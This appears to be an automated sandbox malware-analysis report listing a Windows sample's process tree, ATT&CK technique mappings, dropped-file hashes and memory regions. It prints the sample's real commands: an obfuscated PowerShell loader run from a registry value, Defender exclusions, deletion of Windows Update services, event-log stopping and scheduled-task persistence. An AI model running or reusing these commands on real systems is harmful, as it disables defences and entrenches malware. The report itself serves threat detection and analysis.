      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1076
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:972
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:272
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:340
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1044
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1116
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:1524
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2472
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2504
- C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
  C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:2012
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    PID:2748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3036
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:2992
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2264
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2588
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1660
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:2300
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2356
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1580
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2540
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2164
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2404
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2352
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:2168
- - C:\Windows\system32\dialer.exe
    dialer.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2908

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:492

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:500

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1204
- C:\Users\Admin\AppData\Local\Temp\647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe
  "C:\Users\Admin\AppData\Local\Temp\647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2628
- - C:\Users\Admin\AppData\Local\Temp\Tbcelsmfm.exe
    "C:\Users\Admin\AppData\Local\Temp\Tbcelsmfm.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2876
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      PID:2728
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:2640
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:1572
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:2772
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1052
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:1036
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:2616
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:1924
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1788
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1784
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1800
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2456
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2572
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WAGDKRVZ"
      4⤵
      Launches sc.exe
      PID:1528
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:2172
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:1808
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WAGDKRVZ"
      4⤵
      Launches sc.exe
      PID:2068
- - C:\Users\Admin\AppData\Local\Temp\lgigivedpdvfs.exe
    "C:\Users\Admin\AppData\Local\Temp\lgigivedpdvfs.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:2844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:580
  - - C:\Windows\system32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3000
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:2676
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:2956
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:2996
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:3036
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:3032
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:2356
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:2344
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        Modifies security service
        
        PID:1584
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:1624
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:840
  - - C:\Windows\system32\cmd.exe
      cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of WriteProcessMemory
      PID:1964
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:572
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1088
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1868
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2908
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn Barac /tr "'C:\Program Files\Cuis\bon\Bara.exe'"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:592
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Drops file in Windows directory
      PID:2372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1388
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn Barac
        5⤵
        
        PID:2636
- - C:\Users\Admin\AppData\Local\Temp\MLjvrefsd5vf1.exe
    "C:\Users\Admin\AppData\Local\Temp\MLjvrefsd5vf1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2236
  - - C:\Windows\system32\schtasks.exe
      "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\MLjvrefsd5vf1.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2792
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2856
    - - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2768

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-188022641194438583-1166848697571847736-211281607444530689-1199987151946631531"
1⤵
PID:2396

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1035950062-609125108465689674749347248-630089787-1010683332-1198893809561511885"
1⤵
PID:1684

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "821772496-1898632922330354591148307293-1127429204-286392489-1179141927-196636174"
1⤵
PID:2512

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1682896956202944496213363908291280588263-16470084681203047867-423207058200723790"
1⤵
PID:1400

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "199173475718769569813065650581001242845572099432-1956303465903703560605637950"
1⤵
PID:1100

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1413017150872024146-894009991-1126031693-2110682361274063766-1415290605-856180749"
1⤵
PID:2200

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1036825620-156677900919052271191470629775-396378524976370374624016097185862462"
1⤵
PID:2608

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1753259202-1100423246173043720-257900786982594917-445320303-914314312692905991"
1⤵
PID:1596

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2496461811105960377337231057-1311041740196974963956001752710877056661465107173"
1⤵
PID:1556

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1608092085-11119787324250155591846670161-1824997345-1489253541-1998172377-1478017171"
1⤵
PID:2272

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "662692508-1398600115515114389202052402017673784709153142291019654829-1198945804"
1⤵
PID:2724

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-5197085357153183342553707-1013411195-429646914-646001831913987628-1976240395"
1⤵
PID:888

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1285396323-1887809385-868030088-1141309430-51676087-889770874490402543-1195793864"
1⤵
PID:2184

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-37831466-1199162712442723124-15631379921230857612-8738846221057216127-1648641790"
1⤵
PID:1288

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1165028729-188269408416159721595317754113987417042015468909-1826074785823839148"
1⤵
PID:2220

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2143980836717059831-466570447-1583558100527091433-15417314101177287612-428990818"
1⤵
PID:2420

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1981088772-1647988643-523172151107727908018180272671758006047-2086229042-569060533"
1⤵
PID:1340

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1279889008682695494781099978113914946581872692614295593642086310981-379331984"
1⤵
PID:1720

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1527614020-629737386-46689993410970061341287926025-2072727917-432867185611928"
1⤵
PID:2612

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-963490330908528426-1726696351-3517151281707432510063252232033013899945532"
1⤵
PID:1660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Libs\g.log

Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\MLjvrefsd5vf1.exe

Filesize
502KB

MD5
ea001f076677c9b0dd774ae670efdf63

SHA1
37a4466f3c38b60a30fc1073b9d0b2d2d0e692e5

SHA256
19fd26fa3f76141cc05ef0c0c96ea91dcf900e760b57195f216a113b1cf69100

SHA512
6d634f47c0901e18cb159732c0ca1e7e6c930d16b18d0daea717c252ec7ddd37e90745b69512313dbbdac9099059b6f7cbe07044a71b36231c027818810c8652

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
10893a18d3c275fbf5ca726fcb6644b6

SHA1
de5137e5f3690c5b76d517acbb702cca53b69754

SHA256
8a8fb14607ce005bc0f791983a45ecd72e4e21a9d819c7b0ad40392e112b78c0

SHA512
66b54de3d25d0fa706e858ed66da600237103c14617620b229fc4e380209aa17c939dd27dbf3ee0ba79024fa39cf46f7c23b7e4c6f2550f31c374e517cd17b63

Download Submit
C:\Windows\Tasks\dialersvc32.job

Filesize
1KB

MD5
45bb49281c9b4140623d347c171e473d

SHA1
9a6ee31baa53c9bbd5adbc0900013269bfac5fa1

SHA256
aecb0a864b20c6a27f332b51ff1c5d65f1f0ed70169e07ba232505871f7208df

SHA512
34da01af236979283719b5fe9554875063040d3383c844d596ea6414b67ce862deb9cfe04d11bd7df34bbee981da7d5c816d948ff08b20335984bbd736119c6e

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
1KB

MD5
dd49aeb964cc16374b13e1cfb19dcc10

SHA1
ee12c9c1a71a071ca74a83f2ed424e0b48cf0a0a

SHA256
d753e186a670d526b7d303f4f273064546861b14a31b2db3845d6f8914c63a15

SHA512
2cdcf5e41667d18c0966cc3b91b8e07e5b634b7d9f5c9f7cdc274dfb98f0fd159f52c81365a5cad4d76aabdf8e2573b9b89495e137d1ed63cc38b39760d868d9

Download Submit
\Program Files\Cuis\bon\Bara.exe

Filesize
2.4MB

MD5
b70a5e7260b025e39b8016523a1f2d64

SHA1
aea86a6e4d9ba908d9e141a5d4166ba1e3b1b6a7

SHA256
fd7327848bb13a7a2919447c1818935482527bcc7de7da835b907826b7488490

SHA512
a0b63100553d8ae1bbc6471cc0b63499d82ff1503dc17f46cb1aee07a1332a053c485b74bbe7670638ff0d069496751f9326f9bbb6df96f794acb73969b182ca

Download Submit
\Users\Admin\AppData\Local\Temp\Tbcelsmfm.exe

Filesize
2.7MB

MD5
952f360a4651f948be3a673178631641

SHA1
60e58b89cfce587aa121baf431d55cbbecd21545

SHA256
a92133787af66e6d68a301ef087e4116f5cab3f538d8ec5e5e0eb95cecc68ea8

SHA512
af346587c95ac9e120ce63d46b22992e3ab69702af602ea6d7a16c3dcf9d2f7f19903233646cef8153aa877f5773c486db504ea6534bcbc3b136bd07b62483d0

Download Submit
\Users\Admin\AppData\Local\Temp\lgigivedpdvfs.exe

Filesize
2.4MB

MD5
8e40252356a6fb3f8f52d1effa2c2c3c

SHA1
3bf5461b591a53dcb48ea2dc6535cd90aa786c4e

SHA256
de83dd82da3ebaa2c09fd75a7307ad5e2031ad8c911cd75753ffef3eb1571f0a

SHA512
c3286845aa20f9bf06bfbccb63c12a72ed223fc054881a66b643f55f81aa0df868c28199090cab6d37552b268615dc0605587a85f0d4ec6ee6d5ed25a5739a2a

Download Submit
memory/432-109-0x0000000000BC0000-0x0000000000BEA000-memory.dmp

Filesize
168KB

Download
memory/432-87-0x0000000000B90000-0x0000000000BB3000-memory.dmp

Filesize
140KB

Download
memory/432-89-0x0000000000B90000-0x0000000000BB3000-memory.dmp

Filesize
140KB

Download
memory/476-105-0x000007FEBF790000-0x000007FEBF7A0000-memory.dmp

Filesize
64KB

Download
memory/476-106-0x00000000378B0000-0x00000000378C0000-memory.dmp

Filesize
64KB

Download
memory/476-93-0x00000000000C0000-0x00000000000EA000-memory.dmp

Filesize
168KB

Download
memory/492-118-0x000007FEBF790000-0x000007FEBF7A0000-memory.dmp

Filesize
64KB

Download
memory/492-117-0x00000000001A0000-0x00000000001CA000-memory.dmp

Filesize
168KB

Download
memory/492-119-0x00000000378B0000-0x00000000378C0000-memory.dmp

Filesize
64KB

Download
memory/552-82-0x0000000077870000-0x0000000077A19000-memory.dmp

Filesize
1.7MB

Download
memory/552-83-0x0000000077750000-0x000000007786F000-memory.dmp

Filesize
1.1MB

Download
memory/552-84-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/552-81-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/552-80-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/580-43-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/580-42-0x000000001B7B0000-0x000000001BA92000-memory.dmp

Filesize
2.9MB

Download
memory/596-114-0x000007FEBF790000-0x000007FEBF7A0000-memory.dmp

Filesize
64KB

Download
memory/596-115-0x00000000378B0000-0x00000000378C0000-memory.dmp

Filesize
64KB

Download
memory/596-110-0x00000000003C0000-0x00000000003EA000-memory.dmp

Filesize
168KB

Download
memory/2012-907-0x0000000000A30000-0x0000000000A38000-memory.dmp

Filesize
32KB

Download
memory/2236-28-0x000007FEF5763000-0x000007FEF5764000-memory.dmp

Filesize
4KB

Download
memory/2236-36-0x000007FEF5760000-0x000007FEF614C000-memory.dmp

Filesize
9.9MB

Download
memory/2236-30-0x000007FEF5760000-0x000007FEF614C000-memory.dmp

Filesize
9.9MB

Download
memory/2236-29-0x00000000012D0000-0x0000000001354000-memory.dmp

Filesize
528KB

Download
memory/2372-70-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/2540-75-0x0000000019EA0000-0x000000001A182000-memory.dmp

Filesize
2.9MB

Download
memory/2540-76-0x0000000001120000-0x0000000001128000-memory.dmp

Filesize
32KB

Download
memory/2540-77-0x000000001A390000-0x000000001A3D0000-memory.dmp

Filesize
256KB

Download
memory/2540-78-0x0000000077870000-0x0000000077A19000-memory.dmp

Filesize
1.7MB

Download
memory/2540-79-0x0000000077750000-0x000000007786F000-memory.dmp

Filesize
1.1MB

Download
memory/2748-619-0x0000000000980000-0x0000000000988000-memory.dmp

Filesize
32KB

Download
memory/2844-54-0x000000013F410000-0x000000013F676000-memory.dmp

Filesize
2.4MB

Download
memory/2844-37-0x000000013F410000-0x000000013F676000-memory.dmp

Filesize
2.4MB

Download
memory/2856-35-0x0000000000F10000-0x0000000000F94000-memory.dmp

Filesize
528KB

Download
memory/2908-49-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/2908-50-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download